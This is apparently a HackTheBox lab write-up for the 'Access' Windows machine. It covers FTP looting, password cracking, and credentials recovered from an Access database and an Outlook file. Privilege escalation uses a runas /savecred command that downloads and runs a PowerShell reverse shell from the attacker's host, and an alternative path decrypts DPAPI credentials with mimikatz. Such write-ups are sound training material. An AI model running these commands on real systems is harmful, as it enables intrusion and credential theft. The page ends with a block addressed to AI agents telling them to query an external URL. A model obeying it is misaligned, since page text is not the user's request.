# HTB- Access
## Enumeration
***
**Scope**
> IP Address: 10.10.10.98
**Nmap Scan**
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
23/tcp open telnet syn-ack
80/tcp open http syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p21,23,80 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
```
* Open ports: 21 - 23 - 80
* UDP Open ports: None
* Services: FTP - TELNET - HTTP
* Versions:
* Important Notes:
```
**Enumeration**
**HTTP** The webapp didn't reveal anything except this image at `http://10.10.10.98`
**FTP** I'm used to downloading all files on ftp server by one command and explore them locally
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
FINISHED --2024-07-07 11:19:01--
Total wall clock time: 1m 4s
Downloaded: 5 files, 5.4M in 43s (129 KB/s)
```
all files downloaded in `10.10.10.98` folder
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ ls
10.10.10.98 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ tree 10.10.10.98
10.10.10.98
├── Backups
│ └── backup.mdb
└── Engineer
└── Access Control.zip
```
Looking into `zip` file, it contains a `.pst` file and also encrypted
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ unzip -l 10.10.10.98/Engineer/Access\ Control.zip
Archive: 10.10.10.98/Engineer/Access Control.zip
Length Date Time Name
--------- ---------- ----- ----
271360 2018-08-24 01:13 Access Control.pst
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Engineer/Access\ Control.zip
10.10.10.98/Engineer/Access Control.zip: Zip archive data, at least v2.0 to extract, compress
ion method=AES Encrypted
```
I will get the hash with `john the ripper` and attempt to crack it
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ zip2john Access\ Control.zip > zip.hash
```
Cracking Failed
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Session completed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --show
0 password hashes cracked, 1 left
```
I want to know what is that file and from the output below it's `Microsoft Access Database`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Backups/backup.mdb
10.10.10.98/Backups/backup.mdb: Microsoft Access Database
```
I had to move it to windows host and explore it.
I found a table that contain usernames & passwords
```
admin:admin
engineer:access4u@security
backup_admin:admin
```
I will try to telnet with these credentials since, there is no SMB protocol
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ hydra -L users.lst -P passwords.list telnet://$ip
1 of 1 target completed, 0 valid password found
```
## Initial Access
***
I remember that I couldn't crack the `zip` file, So I will try these passwords to decrypt the file
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=passwords.list
access4u@security (Access Control.zip/Access Control.pst)
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ 7z x Access\ Control.zip
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
```
It revealed `Access Control.pst` file and I wanted to know what its type
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
```
It's `Microsoft Outlook Personal Storage`, I moved it to my windows host and opened it with `outlook`
It contains an email with the following data
```bash
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
```
So, We get a new credentials `security:4Cc3ssC0ntr0ller` and I will try it on telnet
```
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
```
```bash
C:\Users\security>type Desktop\user.txt
713d8fafce27a927227b6a3124c79ea3
```
> User Flag: 713d8fafce27a927227b6a3124c79ea3
***
## Privilege Escalation
When I land on any windows machine on `HTB`, I always run `cmdkey /list` to view saved credentials
```powershell
C:\Users>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
```
This can be abused to run as admin with `runas` command.
Since we can't execute `.exe` files, I will try to execute `.ps1` as administrator, So I grep `Invoke-PowerShellTcp.ps1` from my host, start `webserver` & `nc` listener and execute the command as `administrator`
We must add this line before executing the shell to `Invoke-PowerShellTcp.ps1`
```bash
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 443
```
Change IP & Port to yours when modifying the file
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ python3 -m http.server 80
```
Netcat listener
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
```
```bash
C:\Users\security> runas /savecred /user:ACCESS\Administrator "PowerShell -c IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"
```
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ web-server
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [08/Jul/2024 05:31:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.98] 49161
PS C:\Windows\system32>whoami
access\administrator
```
```bash
PS C:\Windows\system32> cd C:\Users\administrator\Desktop\
PS C:\Users\administrator\Desktop> type root.txt
066b2ca40b4ab07b4387c6e4fe06bc32
```
> Root Flag: 066b2ca40b4ab07b4387c6e4fe06bc32
## Alternative path
Since the administrator credentials is stored in `security` user session, We can get the credentials by decrypting `DPAPI` secrets
We must have two files `masterkey` & `credentials` and there are located in current user directory under `C:\Users\Security\AppData\Roaming\Microsoft\` but hidden.
I personally use `ls` with `-Force` flag to list hidden files
```bash
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\
Directory: C:\Users\Security\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s 8/22/2018 10:18 PM Credentials
d---s 8/22/2018 10:18 PM Protect
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Protect
Directory: C:\Users\Security\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s 8/22/2018 10:18 PM S-1-5-21-953262931-566350628-63446256-1001
-a-hs 8/22/2018 10:18 PM 24 CREDHIST
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Credentials
Directory: C:\Users\Security\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs 8/22/2018 10:18 PM 538 51AB168BE4BDB3A603DADE4F8CA81290
```
I will encode the two files as base64 and decode them in my attack host
```PowerShell
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262
931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 .\key
CertUtil: -encode command completed successfully.
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Credentials\51AB168BE4B
DB3A603DADE4F8CA81290 .\key1
CertUtil: -encode command completed successfully.
C:\Users\security>type key
-----BEGIN CERTIFICATE-----
AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMA
LQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAA
sAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9g
uV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6
DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7
Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOc
wFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAA
D+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1
/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1
Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ
-----END CERTIFICATE-----
C:\Users\security>type key1
-----BEGIN CERTIFICATE-----
AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9
ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQA
aQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/
MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m
5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nu
WlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+
WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZh
xcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2h
X5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJs
ZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zW
C+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJ
vEgzQvv2cbicmQ==
-----END CERTIFICATE-----
```
On windows host:
```PowerShell
mimikatz # dpapi::masterkey /in:C:\Users\HTB\Desktop\masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 00000005 - 5
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 9c51ca4d00708c73d4fbff60b95e549e
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 4bb6dd9b5b9656d97b78f114796457f4
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa
[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {009668e5-9305-401b-ba0d-dfa0e11b34d0}
[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
```
Decrypting `credentials` file with masterkey
{% hint style="info" %}
Note: We can provide the masterkey with /masterkey:\ but mimikatz does it automatically
{% endhint %}
```PowerShell
mimikatz # dpapi::cred /in:C:\Users\HTB\Desktop\credentials
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
dwDataLen : 00000100 - 256
pbData : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
dwSignLen : 00000040 - 64
pbSign : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99
Decrypting Credential:
* volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000f4 - 244
credUnk0 : 00002004 - 8196
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 8/22/2018 9:18:49 PM
unkFlagsOrSize : 00000038 - 56
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=ACCESS\Administrator
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : ACCESS\Administrator
CredentialBlob : 55Acc3ssS3cur1ty@megacorp
Attributes : 0
```
So, the admin credentials are `administrator:55Acc3ssS3cur1ty@megacorp`
```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip
login: administrator
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>type Desktop\root.txt
066b2ca40b4ab07b43xxxxxxxxxxxxx
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/easy/htb-access.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.